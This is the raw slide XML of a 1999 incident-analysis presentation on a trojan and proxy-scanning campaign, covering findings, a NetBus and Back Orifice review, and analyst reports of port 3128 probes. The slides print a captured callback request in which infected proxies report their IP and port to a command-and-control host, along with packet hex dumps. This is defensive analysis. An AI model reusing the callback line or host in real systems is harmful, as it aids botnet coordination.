            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>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32640" indent="-3326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amining the Apache logs showed what we had hoped for:</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End Game</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353520" y="2208240"/>
            <a:ext cx="85305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t http://www.rusftpsearch.net/cgi-bin/pst.p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t mode = writeip&amp;pst host=192.168.2.1&amp;pstport=3128</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="821520" y="4267080"/>
            <a:ext cx="7221600" cy="1373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proxy is being used to send its ow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P address and proxy por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me to the “mothership”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view of Findings</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>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EXE attempts to retrieve files from various webservers</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>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ST.EXE is the active scanner</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n’t require the its.dat file to run</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="32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ed proxies send their IPs to www.rusftpsearch.n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Questions Still Remain</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>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ection mechanism?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4" marL="18514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w does it start at boot time?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4" marL="18514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What is the its.dat file for?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="36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rgeting</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="32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n intensity dial</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="32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ack configu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mplications?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>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Quantum leap in distributed attack technology</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4" marL="195444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ral infection rates</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figurable - its.dat</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nning -&gt; attacking?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="32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tomatic result consolidation</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="705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8" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3352680"/>
            <a:ext cx="7772400" cy="2743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ank you</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NETBUS" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="228600"/>
            <a:ext cx="9144000" cy="6172200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="152280"/>
            <a:ext cx="9144000" cy="990720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0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Tahoma"/>
              </a:rPr>
              <a:t>Trojans</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5713920"/>
            <a:ext cx="9144000" cy="764280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffcc00"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Driving the Bus”, NETB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ep Throat - 2140</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294120" y="1905120"/>
            <a:ext cx="8501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200.31.13.8 &gt; 158.12.110.1.2140: udp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4500 001e e104 0000 7111 8795 ac14 0d0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a8 6e01 ea60 085c 000a fbb7 3030 808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0001 0001 0000 0000 0664 6f6e 616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200.31.13.8 &gt; 158.12.110.2.2140: udp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4500 001e e204 0000 7111 8694 ac14 0d0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a8 6e02 ea60 085c 000a fbb6 3030 0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0001 0000 0000 0000 0331 3831 023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ojans Review</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>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most well known trojan programs are Netbus and Back Orifice</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="36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ective tools include: all major anti-virus tools, nuke nabber, NFR’s Back Officer Friendly and AtGuar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tting A Clue</a:t>
            </a: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t 19, 1999    Roland Grefer writes with an AtGuard detect from his home.com cablemodem</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="36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e both commented that probes to tcp port 3128 are not that commo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at_guard_detect" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3332880" y="878040"/>
            <a:ext cx="50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Guard http://www.atguard.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ore Clues</a:t>
            </a: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t 21, 1999 - SHADOW analyst Adena Bushrod reports similar activity</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>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act other organizations:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>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MITRE, ARL</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>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y see it too!</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4T20:24:06Z</dcterms:created>
  <dc:creator>Northcutt</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>nobody</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">1999-11-07T19:20:40Z</dcterms:modified>
  <cp:revision>75</cp:revision>
  <dc:subject/>
  <dc:title>No Slide Title</dc:title>
</cp:coreProperties>
</file>